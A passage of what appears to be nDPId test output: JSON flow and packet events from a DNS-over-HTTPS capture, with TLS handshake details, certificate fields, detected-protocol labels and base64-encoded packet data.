-00753{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":946739400612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":268,"pkt_l4_len":234,"thread_ts_msec":946739400612,"pkt":"ZmZmZmZmRERERERECABFAAD+44BAADQGi2vBRlULCgAAAQG705Siz6CRpzc6clAYAfVAMQAA7MoGonW0Fj4lHArVaOCgJtbHn9aRY0n9LKnu3cTyqbChLhfccHsdC81z2fZ+Ukv\/nAuBoKACJX8Pwem5JBIGeQ+hR9gvbJqO0dljTEjfnQJGlcWyJk4FqoFjayNoVLdbRg\/yWeK8VeLtflQjLxqwMpDM\/QbduG5HAuBrFrE4C7dTGq1PezTGhU9pqGsXAwMARb1ScBcpf\/m81VPRA3LW\/2mv0IZmicbA7T0x5byJ5bKDeMQneniKc1y1kH9Jz7ueZz9IjjqOqk3CW8r0ZREMc3BCfYPYBQ=="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400702,"flow_last_seen":946739400702,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739400702,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":946739400702,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739400702,"pkt":"REREREREZmZmZmZmCABFAAFILINAAH4GS1wKAAAB0frxGYuCAbtSRrNTwAekRVAYAfaFCwAAFgMBARsBAAEXAwMzpeRPPpmPOBWwlYuEr5uNgoasUYbxY5rOmYFKCjGtJyAIAEydch7b9cupGuDzo92xh9NLKrnQMxUlfE7nWZM5\/gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASamFyamFyLm1lZ2FuZXJkLm5sAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIJeuQLdGEJN7n7Os\/LoZLYTlp1p11dddxIYAQZdOassB"} -00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400702,"flow_last_seen":946739400702,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739400702,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-03224{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":946739400727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2102,"pkt_l4_len":2068,"thread_ts_msec":946739400727,"pkt":"ZmZmZmZmRERERERECABFAAgouN1AADcG\/yHR+vEZCgAAAQG7i4LAB6RFUka0c1AYAfWL6wAAFgMDAGYCAABiAwNagb8+u4y1yd1xwzS1nH\/nTUIdC4eY2A55MtUayrM8fyDO5yrWZS4Aa1iS7gSLPLT\/C8LAuC029TJv1sr4CTESSMAwAAAa\/wEAAQAACwAEAwABAgAFAAAAEAAFAAMCaDIWAwMKAwsACf8ACfwABWAwggVcMIIERKADAgECAhIDDKJHTnwjwsnrm2DLrI1zNLUwDQYJKoZIhvcNAQELBQAwSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMB4XDTIwMDcxNDIzNDcyMVoXDTIwMTAxMjIzNDcyMVowHTEbMBkGA1UEAxMSamFyamFyLm1lZ2FuZXJkLm5sMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv9OPyuZ6JwIE6bPDfiRhbYPMkVlSRq93tijiXoOFC9OQc4eXtoMomU6kKPy5Z0NTzEB3WAHxrA4SRx6q3\/yefPeWA8HsMuYfQZpftg95obbyxbYYejVTJGcDt7bBAbyfyHwpa9VQXCZ1NM6170XCwqiTXQ5pCT67h001VbP663EnKohkf0MUwppbn6Q5xEFc+o+3D6IU\/rxkzW1SQTh0phbzb1Op8DfM63A\/ZtxaA5UoEOBp23CMkB\/vP5ul2uJharTqU\/BfvvV3HB\/zu9o43hkbooUEyMuBJn0+O6orVhwG1QVKM6xj5TM6ZcijU2+3rS+x7vNJUt\/bTHh7sHDviQIDAQABo4ICZzCCAmMwDgYDVR0PAQH\/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRLbCV+QerkMWgquQ7dzQvZqcefiTAfBgNVHSMEGDAWgBSoSmpjBH3duubRObemRWXv86jsoTBvBggrBgEFBQcBAQRjMGEwLgYIKwYBBQUHMAGGImh0dHA6Ly9vY3NwLmludC14My5sZXRzZW5jcnlwdC5vcmcwLwYIKwYBBQUHMAKGI2h0dHA6Ly9jZXJ0LmludC14My5sZXRzZW5jcnlwdC5vcmcvMB0GA1UdEQQWMBSCEmphcmphci5tZWdhbmVyZC5ubDBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQQGCisGAQQB1nkCBAIEgfUEgfIA8AB3AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc0\/ws2wAAAQDAEgwRgIhAMWgM8fCSKocSMS6vNmRTIKDzMWXKgtHRh\/4TftRR0QHAiEA3JSerrntM9u7waurWrvwybuL6dB9RsJnzjR8MMY9tuIAdQAHt1wb5X1o\/\/Gwxh0jFce65ld8V5S3au68YToaadOiH
AAAAXNP8LOOAAAEAwBGMEQCIG6J2T+qpPVVFxjS27cFglwKmn3u\/zi2QCL4kFgVvwefAiAZm3eKKyeMogTwUuYzbx+RsfIEqA9nNOdkRRv\/z1FxuzANBgkqhkiG9w0BAQsFAAOCAQEAcAija84yR1ADOoiyrdQFCgxJZB2BUUNBtRgi8ZPFZIdUaVPomyGL3oK59c6IO+gMw6xbSeGsLaVjettLRMJ2uMl6JZkgjV1Bhp3NdPQKieFpoaEiEBUAwqL8TSBKdJ\/mAMQLAKadqZ1hZKcVTPtXVdd5Q28iLasE\/NjtopLZOa1XOJt0sUbRAHa2FOZzb42ureqnIdzzYgm+hY18KJUkfrSxCg2dd4MTgQuYu+ZhUpaMB2rAm94XcTgVTGO5ADi5NM0oEFFNdNKrAyCom1jWC2m8LyYfCzUJEAYCAUd1WL438vW1Z0FQZK5dAca9qTf6FxrRdYRYrY7oGND3IwvyWwAEljCCBJIwggN6oAMCAQICEAoBQUIAAAFThXNqC4XspwgwDQYJKoZIhvcNAQELBQAwPzEkMCIGA1UEChMbRGlnaXRhbCBTaWduYXR1cmUgVHJ1c3QgQ28uMRcwFQYDVQQDEw5EU1QgUm9vdCBDQSBYMzAeFw0xNjAzMTcxNjQwNDZaFw0yMTAzMTcxNjQwNDZaMEoxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MSMwIQYDVQQDExpMZXQncyBFbmNyeXB0IEF1dGhvcml0eSBYMzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJzTDPBa5S5Ht3JdN4OzaGMw6tc1Jhkl4b2+NfFwki+3uEtBBaupnjUIWOyxKsRohwuj43Xk5vOnYnG6eYFgH9eRmp\/z0HhncchpDpWRz\/7mmelgPEjMfspNdxIknUcbWuu57B43ABycrHunBerOSuu9QeU2mLnL\/W08lmjfIypCkAyGdGfIf6WauFJhFBM\/ZemCh8vb+g5W9oaJ84U\/l4avsNwa72sNlRZ9xCugZbKZBDZ1gGusSvMbkEl4L6KWTyogJSkExnTA0DHNjzE4lRa6qDO4Q\/GxH8Mwf6J5MRM9LTb44\/zyM2q5OTHFr8SNDR1kFjOq+oQpttQLwNh9w5MCAwEAAaOCAX0wggF5MBIGA1UdEwEB\/wQIMAYBAf8CAQAwDgYDVR0="} -00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":470,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400702,"flow_last_seen":946739400727,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":2336,"flow_avg_l4_payload_len":1168,"midstream":1,"thread_ts_msec":946739400727,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":946739400727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1535,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1535,"pkt_l4_len":1501,"thread_ts_msec":946739400727,"pkt":"ZmZmZmZmRERERERECABFAAXxuN9AADcGAVfR+vEZCgAAAQG7i4LAB6xFUka0c1AYAfWJtAAADwEB\/wQEAwIBhjB\/BggrBgEFBQcBAQRzMHEwMgYIKwYBBQUHMAGGJmh0dHA6Ly9pc3JnLnRydXN0aWQub2NzcC5pZGVudHJ1c3QuY29tMDsGCCsGAQUFBzAChi9odHRwOi8vYXBwcy5pZGVudHJ1c3QuY29tL3Jvb3RzL2RzdHJvb3RjYXgzLnA3YzAfBgNVHSMEGDAWgBTEp7Gkeyxx+tvhS5B1\/8QVYIWJEDBUBgNVHSAETTBLMAgGBmeBDAECATA\/BgsrBgEEAYLfEwEBATAwMC4GCCsGAQUFBwIBFiJodHRwOi8vY3BzLnJvb3QteDEubGV0c2VuY3J5cHQub3JnMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuaWRlbnRydXN0LmNvbS9EU1RST09UQ0FYM0NSTC5jcmwwHQYDVR0OBBYEFKhKamMEfd265tE5t6ZFZe\/zqOyhMA0GCSqGSIb3DQEBCwUAA4IBAQDdM9cR82NYON0YFfsJVb52VrlwSKVpRyd7wiQIkvFaH0oSKTckdFEcYmi4zZVwZ+X3pLxOKFHNm+iuh53q2LpaoQGa3PDdah1q2D5XI56mHgRimv\/XBcq3Hz\/ACki8lLC2ZWLgwVTloyqtIMTp5rvcyPa1wzKjmMx3qOZ5ZQcryyj+OhZSgc5SDC5fg+jVBjP7d2zOQOoynh+SXEHBdGxbXQpfM8xNn6w48C97LGKd2aORbyUbL5CxGUY99n4bpnqHuaN6bRj6JaWRhxXg8hYvWLAGLyxoJsZLmM3anwz5f5DtQ0oSRE5vc3oo6qSqbntMfYfd4MkCRKeHr8M0W7RCFgMDAhcWAAITAQACDzCCAgsKAQCgggIEMIICAAYJKwYBBQUHMAEBBIIB8TCCAe0wgdahTDBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMYDzIwMjAwOTA0MDA0OTAwWjB1MHMwSzAJBgUrDgMCGgUABBR+5mrncpqz\/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7\/Oo7KECEgMMokdOfCPCyeubYMusjXM0tYAAGA8yMDIwMDkwNDAwMDAwMFqgERgPMjAyMDA5MTEwMDAwMDBaMA0GCSqGSIb3DQEBCwUAA4IBAQAoMB1eP
ZKC8NpTy2434kCI6h8NAXGSDejnRZYFr2QSx+TpoZipUWbMWCq8UzrMIxKC8UJACJQc6RIM+Xgz0ZRbGx25OD3V4vLxsczn\/nEIsXCHGvGoEBJqPqesQfpmU9r+oB2CbUgxGaJxDFqnidG6tH5KNxFVbrX2lPzXeDzKwLN1eUiZU\/lMuAOJwkK8zmwVXP5H7g6aco+MiZp06K8b\/Da3w0YGUY9fjEablMtV5ViuxARhZw1pWYWZo\/jGfvICDNvPKmx8V1X1Z4R8rNjm8UiPRR8P0NarasVvNtWs+6fXGpl\/hFMZzj6z4oAVh0vYNXKYxmaDs8l6pH8OOZ\/cFgMDASwMAAEoAwAdIBuLZjnTB3Kjce7+mNxfaBiRgPo4iNkyTjzm6+fh98MBCAQBAAD35z4OurpaleuYyQXrRwgunZx5itw99f\/qns7fqVRPpCakkPBqYtIkrAQds7t3x9gcyB3pN\/ek7QU4lXsRRnsrWpFsVpkkgouj8noQcYPmvp55cuzOEjLxYK5KOB1bU10ZmdANW3hMqgjTathZk6jfjNOD8MgF15uckgPUXOITOpG7UYd\/YtxRx7xgMGY0jlH\/+xeUF+NSAiy6s9oSi0oU\/QlatPOidPhVmRC84vWQNkgJhZubcKWseKLjiRRL9zUmMJ2fjig0R0EKUVh0pAUSNWsA0m3x1YIPV6kX\/fzGNkCBx4kijVkxENgEgAD9si+WguAjMtSH5qQYN0CMxwsWAwMABA4AAAA="} -01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":471,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946739400702,"flow_last_seen":946739400727,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":1272,"midstream":1,"thread_ts_msec":946739400727,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","server_names":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority 
X3","subjectDN":"CN=jarjar.meganerd.nl","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"17:C9:8C:F5:DD:1F:0E:0F:DC:C5:42:4F:ED:C4:CD:57:5A:5D:7A:4F"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739401864,"flow_last_seen":946739401864,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739401864,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":946739401864,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":946739401864,"pkt":"REREREREZmZmZmZmCABFAAFMN1VAAH4GvigKAAABX9jlmatwAbtGU6iimu8Jz1AYAfYHbQAAFgMBAR8BAAEbAwOH23fm3DrJaQXLovxzyYyk5R\/PesPVPPqPMsnNPw9NhCA+BKUjIeM9NnmcNXI7jO56RaAWoMnCcXIJRfPvBK89HQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACsAAAAGwAZAAAWZmkuZG9oLmRucy5zbm9weXRhLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAgB93oNekrupxQPrzRHifFos9GGTUaOGYLuLqXCSqLFg=="} 
-00915{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739401864,"flow_last_seen":946739401864,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739401864,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fi.doh.dns.snopyta.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04384{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":946739401922,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739401922,"pkt":"ZmZmZmZmRERERERECABFAAuALHhAADcGBdJf2OWZCgAAAQG7q3Ca7wnPRlOpxlAQAfURoQAAFgMDAHoCAAB2AwPibR+Wkzsx56DJDm5Eu1YLQR+8sKrid6w\/L4hLlzFi7CA+BKUjIeM9NnmcNXI7jO56RaAWoMnCcXIJRfPvBK89HRMCAAAuACsAAgMEADMAJAAdACBuK8qBa63Irnemz8DqNJ321mRXUwu2HpEN9mUutJb4PxQDAwABARcDAwAkUOaHYP5iZ2NNWAzfU4nuMAsSlIi3Xu6evUH+ePghzyW3lf1oFwMDDTdyOxvGAqdaXqn7mk56YQOkftztBpxUe9++1VUjQL0UTPE4dDghDlADUJrVIMNoajw7OVNVUJlwwZLv4SY0Vx3I7ELfEhgQAcbo8KTKAm9O2ms4MsOpGyCQp3Ck5bHL2bE4iiWi1kZ3XUOEqkWhVOIsnrRavV3YbdvOPn4o+EZD19BNo16d7FYA9cwlYFl0b+UOCHVkbAV5Ro0aksFmIDr9nN\/SKS5iC8KA1HQko\/XCtoZt\/uj26L8Jnm5j0xvi5PCt7eYN7FAf9foi+urRIknTbj0qt5H6t5n2fn2SPs3+74zq4arLW6Grk5JVfjN+EFn6r2Kqt2DBASpVLNRJlEJ\/bKKlz+O8J7CBDjbsuIjIaIhIezaN
NWlBddC5u8MicCjaXDfeK0Y4HdjfUV3F5+ceyWCg99LhDO6xG0CeQL6QAIRHV0AxoEVRoc\/2vMJczsdaR6IckxN7UiFIufmha90IusH6BRII8ooR6OU8Y+2rZzYh5iUJTMhKuwIGbOPxF0ajku7y5uTYXkibFy\/3YRErBGtPfTP8lfcsC0F+hSBQLoIlrMlmFjzaT8UDL1Fvuj09G9ZfRK\/xhCkh\/7LpCMAmZL6FGK8dmeyLYWLMckLWasSF4SpcTPWxHh7bEgM8pdQOrhyOwV2+YyGE03XoHny98Ri5sKrhPxH0mGzGNnfYcuH6skZHVwAgYnBYfjM2lceI\/e8LUGXM+\/wIkpWQtiAxj5n9jqC6nREJd3P5hFhhc0S7dmq+lc8Ma343e0W1q85dFAt5euDl0kwrHQBD26Gn0UFzkp+rMUWqJmbE4SEGibShhwSALXJQIigpcGwGc5IATb5iv3WP28Ditv7SIopWvMI9EzLxDQqdqFyPqSJV1GQA4imlHzXCdMmJY\/F6D02T5M85XegGn9Uw4gKTdpJtNdQMeDpMCJmwPpp3X9pZUOt1oTofSb+42UBMYdGAmqh\/lucphpoooHZAFYzgka8EA3+5grzvvRKo1W30cuUHEkcEYum5QQBIn5p1pvfjSQasw1NoCcIklAiODFbTUw\/XBBzGVXrXLo+F9mr5HZJoE6PhrzpGbM+TbC9rdnXfxtb3I6K\/1AuBezoFfnGsw9Dx8ypoJ2UB3C5fLrpS2ieFOMX42\/Dh6ibKZmCZ2IU\/pKi9Kpxz6Ld6HAwuoH4Me9ywi7Ln36mC5YB9\/TIfNIYZgMETrU\/MCg2bIGnZ8vBftq4oKoZH5CfsoxNFs2PFEG\/5CVigap\/tCrH2NE2mXjfyEkFGiVnnGzcQq0blObS7iaq5g9ULTtsStUYEWVhOXk\/yHu5D3\/u6I0Omh\/4izYUAvc\/ASGJ3mfA9dMkNtOEG3hZYmo5CA9GnSRpy2RNoU8Pnf1XinGwNO1Gx8Pk+Rv6O6rF61GXd3j8LIla3tC+sE1vn8o1HuVrg0vtx6svaMmP8iNm4OXIuTyI0c3BbAjgOOu1kSB8ysQJy2HfJ8f+33ewV4FsqQND6r5bZILZFNT6hlGwEaOaKRgd8Dnd4N9fsicUPP3uwhfe3QdvqzyV7OOrXV1IVMp9zwSZ0pMfc8VWLEkiJAKnWpdefyOUExkz5+iOPBxgjTOCDXI2cxb6a85tRWFrVYfRjxQzYvDOiZkMdWovVcpGmC70Cf9f8rBw+ttYEmVtXQq6aUTGji6XfZ4PQSD6aFRmGvyCQ+CTuysuZPRTT+5cBQgpxWr3YBN+426lIaYsxvZASckGkJyHw7wpODlcoQhARdIU2IKEFRJvw6DT5X9zlpEEie0WCTVJ\/dO+1+JbTJMju5fx4Qacw2bdHAKBR6bgpX06u1h2Q89XiuB5q4CfjBycr3kVeONIM0plxcqhvNckbcicJV\/JrJUajfW3F3ZFA8QjvfJykVgp6OKAIPXZNUHoSa3jNomftQSYqyBfMezehknXHShl6ZuQM+Lvb\/uVlinF17iXo2SvKnezJm3fj5cHaM4wuZjkDVCLAE\/Nyn58e9ksRwhD\/gK97rjgBNP1ml+iaYZj1YbBsIP0G755OxhWhcssAbTkI8hBniALaUqQLLPs72nFgtfIXuPTAuoXoMJT42ulwoxGs43\/GTmjksUYpRygFZP5B0dC11WQeR8PhWFcDRYGLV7beAlYwch7ld5nUdJC5mrDnIj419\/n346cz6AR7+0Rr1O5IOtvdQctvdWRZfPDcKiKYfWWWQsFX4uwaKZ7iAJIc3Lf2Hi65\/5WG2H6DXV2pbdFmOOEMbCE9vzIalbNO5yuH17ffgvNYeseN8QYcMc1RjXhkpanOQhCXFt4LROEa0cWaGgGU8KVcV0lHoP38Yqy9\/r9NNO4BBtoRTZYqyQ2KiKQOeL\/DjGmqmn
MdtRKO3G2+28PYYcreNlQFUQC1YZRjis96nJONLOoYWGmJ0Ajkc88jEcPUWJ+sQ1Ellx00rNPIeTKszE7eeP1Wj7159+psV+5ymtU7Wt8kdIG49kp2vIgkZ9Wr8jWgezRdBIRoNkNszLOkziHLmtjo71cfnALRZTzE3WjtfCQAqXYkE67df0jceQto9+YJvgwPL7SKReSla4kC23BVgPVvhUiIRAomTXxQfxzJl60MjaMhKYx8sdY8yirN79hBVxNOKvYgeXSM9ea5v58WsOsjoz8vxu1i6IS+wpQDUJRL5+7QRTbXkU\/IgZJ2JwIpYJc0TbCcC+KyzLGP46kWX4\/BnWI6G+lC3q+tZ9lzQmQowB2OgB76ZZzVRvbALuU+R4sPYYq0cv634FKIpwY3EtlYdlCLWfp7ZlgIV62ujlYvHhZTRnGetjI9EyQMIK7XK1fm0YXedSc3g1l5p3dkHYgG0bAtbWa59V3\/IoYFT00HruXjbYzC5+RMiqTRk0M0TGZSrhfPeJjn02Zk7jMnppUxVbahEe2he8Uscmty4roTPIhZyQUTcLmzDMG3cPUpihzyQpbl0WSI0dX58QFWhZM7xH+JJmJ8yAAlZtScWFT+AUyElBRyoWx1bFwnu5cjcTiBOKcIA77CG8sc2sMV00Vn5xS5qVm32olnJkfc6ppnqNQxjiR9wVkT49+iYCtbdmX6IKyWQeVFgUqJQ5BvdNdt7w7dJUeuhPf3VRpEO\/JuTbLlvGkK\/mwXyq24LF3XMtkm5t69hBaSeNohEZao6QmYxZ+NYvxyXtLt2f77PL2m3kxOteUzIZiuV3nkbaSTk55VWkCshKS7HYDGARWAphsf+0I+2o6\/uoYI0UX5N6tebXNoxQAq6JRpkCJZ\/PM5xuxlj\/WGjyfe87wS7vqJa3nEKMo793Ew3S5oj8lEIMcctbFE7wTV1TjUaweZw+Z3iwk0WNd4mhDiOEObjosKaAJZJCKcwHWWPj3Pv6sHr9LXFpkSQghXzPF88XInFPHMmaNePQ5+SQ27ys1WSoLOzvUvoiLb3ySSw3OKanqLRonKV7Zpi0Ytvm7fQizCZ+5Ne\/y\/c1MIzQYpj0KO81JwrZo2y2Ztgzyet8\/H8T5HbkOQKczJbxrmsEvEXSl\/OZ3PT4cobEGmH79r1jJnga64YFXN1twHKTB5tOqayNYoY8HWJExA6ECQm2d8vIM6vU7wGAu00l0do6yKY07icxt6ZdPJ5cHBwXXmOf03M\/8KffX9hGO6Tv76sw1+cR37dJRviYmME\/l8otZxWSrf"} -00957{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":487,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739401864,"flow_last_seen":946739401922,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3196,"flow_avg_l4_payload_len":1598,"midstream":1,"thread_ts_msec":946739401922,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"fi.doh.dns.snopyta.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02088{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":946739401922,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1246,"pkt_l4_len":1212,"thread_ts_msec":946739401922,"pkt":"ZmZmZmZmRERERERECABFAATQLHpAADcGDIBf2OWZCgAAAQG7q3Ca7xUnRlOpxlAYAfU2WgAAHSeqZDGEXrFb+J1opG1dnPi4zgteeVslY9ZmFJlRTMTFOW+365tsM\/eWSLFN26wQY3yg0Y1FR+FA00qPga4\/wX0RoMfU+SI0dBiZB1tmIlqRr+vkKc2KX7jGL6yH9pbjNmGWfzy9B2zla2g4H